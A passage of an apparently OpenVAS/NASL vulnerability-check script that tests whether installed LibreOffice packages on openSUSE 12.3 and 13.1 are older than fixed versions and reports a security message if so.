isrpmvuln(pkg:\"libreoffice-icon-theme-oxygen\", rpm:\"libreoffice-icon-theme-oxygen~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-icon-theme-tango\", rpm:\"libreoffice-icon-theme-tango~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-af\", rpm:\"libreoffice-l10n-af~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-am\", rpm:\"libreoffice-l10n-am~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ar\", rpm:\"libreoffice-l10n-ar~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-as\", rpm:\"libreoffice-l10n-as~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ast\", rpm:\"libreoffice-l10n-ast~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-be-BY\", rpm:\"libreoffice-l10n-be-BY~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-bg\", rpm:\"libreoffice-l10n-bg~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-br\", rpm:\"libreoffice-l10n-br~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ca\", rpm:\"libreoffice-l10n-ca~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-cs\", rpm:\"libreoffice-l10n-cs~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-cy\", rpm:\"libreoffice-l10n-cy~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-da\", rpm:\"libreoffice-l10n-da~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-de\", rpm:\"libreoffice-l10n-de~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-el\", rpm:\"libreoffice-l10n-el~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-en-GB\", rpm:\"libreoffice-l10n-en-GB~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-en-ZA\", rpm:\"libreoffice-l10n-en-ZA~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-eo\", rpm:\"libreoffice-l10n-eo~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-es\", rpm:\"libreoffice-l10n-es~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-et\", rpm:\"libreoffice-l10n-et~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-eu\", rpm:\"libreoffice-l10n-eu~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-fi\", rpm:\"libreoffice-l10n-fi~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-fr\", rpm:\"libreoffice-l10n-fr~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ga\", rpm:\"libreoffice-l10n-ga~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-gd\", rpm:\"libreoffice-l10n-gd~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-gl\", rpm:\"libreoffice-l10n-gl~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-gu-IN\", rpm:\"libreoffice-l10n-gu-IN~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-he\", rpm:\"libreoffice-l10n-he~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-hi-IN\", rpm:\"libreoffice-l10n-hi-IN~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-hr\", rpm:\"libreoffice-l10n-hr~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-hu\", rpm:\"libreoffice-l10n-hu~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-id\", rpm:\"libreoffice-l10n-id~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-is\", rpm:\"libreoffice-l10n-is~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-it\", rpm:\"libreoffice-l10n-it~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ja\", rpm:\"libreoffice-l10n-ja~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ka\", rpm:\"libreoffice-l10n-ka~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-km\", rpm:\"libreoffice-l10n-km~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-kn\", rpm:\"libreoffice-l10n-kn~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ko\", rpm:\"libreoffice-l10n-ko~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-lt\", rpm:\"libreoffice-l10n-lt~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-mk\", rpm:\"libreoffice-l10n-mk~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ml\", rpm:\"libreoffice-l10n-ml~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-mr\", rpm:\"libreoffice-l10n-mr~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-nb\", rpm:\"libreoffice-l10n-nb~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-nl\", rpm:\"libreoffice-l10n-nl~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-nn\", rpm:\"libreoffice-l10n-nn~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-nr\", rpm:\"libreoffice-l10n-nr~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-om\", rpm:\"libreoffice-l10n-om~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-or\", rpm:\"libreoffice-l10n-or~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-pa-IN\", rpm:\"libreoffice-l10n-pa-IN~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-pl\", rpm:\"libreoffice-l10n-pl~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-pt\", rpm:\"libreoffice-l10n-pt~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-pt-BR\", rpm:\"libreoffice-l10n-pt-BR~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ro\", rpm:\"libreoffice-l10n-ro~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ru\", rpm:\"libreoffice-l10n-ru~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-rw\", rpm:\"libreoffice-l10n-rw~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-sh\", rpm:\"libreoffice-l10n-sh~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-sk\", rpm:\"libreoffice-l10n-sk~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-sl\", rpm:\"libreoffice-l10n-sl~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-sr\", rpm:\"libreoffice-l10n-sr~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ss\", rpm:\"libreoffice-l10n-ss~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-st\", rpm:\"libreoffice-l10n-st~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-sv\", rpm:\"libreoffice-l10n-sv~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ta\", rpm:\"libreoffice-l10n-ta~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-te\", rpm:\"libreoffice-l10n-te~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-tg\", rpm:\"libreoffice-l10n-tg~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-th\", rpm:\"libreoffice-l10n-th~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-tr\", rpm:\"libreoffice-l10n-tr~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ts\", rpm:\"libreoffice-l10n-ts~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ug\", rpm:\"libreoffice-l10n-ug~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-uk\", rpm:\"libreoffice-l10n-uk~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ve\", rpm:\"libreoffice-l10n-ve~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-vi\", rpm:\"libreoffice-l10n-vi~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-xh\", rpm:\"libreoffice-l10n-xh~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-zh-CN\", rpm:\"libreoffice-l10n-zh-CN~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-zh-TW\", rpm:\"libreoffice-l10n-zh-TW~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-zu\", rpm:\"libreoffice-l10n-zu~3.6.3.2.4~2.9.3\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"openSUSE13.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libreoffice\", rpm:\"libreoffice~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-base\", rpm:\"libreoffice-base~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-base-debuginfo\", rpm:\"libreoffice-base-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-base-drivers-mysql\", rpm:\"libreoffice-base-drivers-mysql~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-base-drivers-mysql-debuginfo\", rpm:\"libreoffice-base-drivers-mysql-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-base-drivers-postgresql\", rpm:\"libreoffice-base-drivers-postgresql~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-base-drivers-postgresql-debuginfo\", rpm:\"libreoffice-base-drivers-postgresql-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-base-extensions\", rpm:\"libreoffice-base-extensions~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-calc\", rpm:\"libreoffice-calc~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-calc-debuginfo\", rpm:\"libreoffice-calc-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-calc-extensions\", rpm:\"libreoffice-calc-extensions~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-debuginfo\", rpm:\"libreoffice-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-debugsource\", rpm:\"libreoffice-debugsource~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-draw\", rpm:\"libreoffice-draw~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-draw-debuginfo\", rpm:\"libreoffice-draw-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-draw-extensions\", rpm:\"libreoffice-draw-extensions~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-filters-optional\", rpm:\"libreoffice-filters-optional~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-gnome\", rpm:\"libreoffice-gnome~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-gnome-debuginfo\", rpm:\"libreoffice-gnome-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-icon-themes-prebuilt\", rpm:\"libreoffice-icon-themes-prebuilt~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-impress\", rpm:\"libreoffice-impress~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-impress-debuginfo\", rpm:\"libreoffice-impress-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-impress-extensions\", rpm:\"libreoffice-impress-extensions~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-impress-extensions-debuginfo\", rpm:\"libreoffice-impress-extensions-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-kde\", rpm:\"libreoffice-kde~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-kde-debuginfo\", rpm:\"libreoffice-kde-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-kde4\", rpm:\"libreoffice-kde4~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-kde4-debuginfo\", rpm:\"libreoffice-kde4-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-prebuilt\", rpm:\"libreoffice-l10n-prebuilt~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-mailmerge\", rpm:\"libreoffice-mailmerge~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-math\", rpm:\"libreoffice-math~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-math-debuginfo\", rpm:\"libreoffice-math-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-officebean\", rpm:\"libreoffice-officebean~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-officebean-debuginfo\", rpm:\"libreoffice-officebean-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-pyuno\", rpm:\"libreoffice-pyuno~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-pyuno-debuginfo\", rpm:\"libreoffice-pyuno-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-sdk\", rpm:\"libreoffice-sdk~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-sdk-debuginfo\", rpm:\"libreoffice-sdk-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-sdk-doc\", rpm:\"libreoffice-sdk-doc~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-writer\", rpm:\"libreoffice-writer~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-writer-debuginfo\", rpm:\"libreoffice-writer-debuginfo~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-writer-extensions\", rpm:\"libreoffice-writer-extensions~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-branding-upstream\", rpm:\"libreoffice-branding-upstream~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-ast\", rpm:\"libreoffice-help-ast~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-bg\", rpm:\"libreoffice-help-bg~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-ca\", rpm:\"libreoffice-help-ca~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-cs\", rpm:\"libreoffice-help-cs~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-da\", rpm:\"libreoffice-help-da~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-de\", rpm:\"libreoffice-help-de~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-el\", rpm:\"libreoffice-help-el~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-en-GB\", rpm:\"libreoffice-help-en-GB~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-en-US\", 